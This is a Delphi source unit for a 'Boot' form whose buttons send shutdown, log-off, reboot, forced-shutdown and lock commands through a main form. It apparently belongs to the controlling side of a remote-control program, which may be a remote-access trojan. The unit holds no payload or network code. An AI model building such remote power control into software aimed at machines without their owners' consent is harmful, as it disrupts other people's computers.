(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untBoot.pas                                     ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Boot form                        ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untBoot;

interface

uses
  Classes, Controls, Forms, Buttons;

type
  TfrmBoot = class(TForm)
    SpdShut: TSpeedButton;
    SpdLogOff: TSpeedButton;
    SpdReboot: TSpeedButton;
    SpdForce: TSpeedButton;
    SpdLockUp: TSpeedButton;
    procedure SpdShutClick(Sender: TObject);
    procedure SpdLogOffClick(Sender: TObject);
    procedure SpdRebootClick(Sender: TObject);
    procedure SpdForceClick(Sender: TObject);
    procedure SpdLockUpClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmBoot: TfrmBoot;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmBoot.SpdShutClick(Sender: TObject);
begin
   frmMain.strStatus:='Fermeture de Windows...';
   frmMain.SendCommand(COMMAND_SHUTDOWN,'');
end;

procedure TfrmBoot.SpdLogOffClick(Sender: TObject);
begin
   frmMain.strStatus:='Fermeture de session...';
   frmMain.SendCommand(COMMAND_LOGOFF,'');
end;

procedure TfrmBoot.SpdRebootClick(Sender: TObject);
begin
   frmMain.strStatus:='Redmarage...';
   frmMain.SendCommand(COMMAND_REBOOT,'');
end;

procedure TfrmBoot.SpdForceClick(Sender: TObject);
begin
   frmMain.strStatus:='Fermeture de Windows...';
   frmMain.SendCommand(COMMAND_FORCE,'');
end;

procedure TfrmBoot.SpdLockUpClick(Sender: TObject);
begin
   frmMain.strStatus:='Windows LOCK en cours...';
   frmMain.SendCommand(COMMAND_LOCKUP,'');
end;

procedure TfrmBoot.FormCreate(Sender: TObject);
begin
   Caption:='Boot';
end;

end.
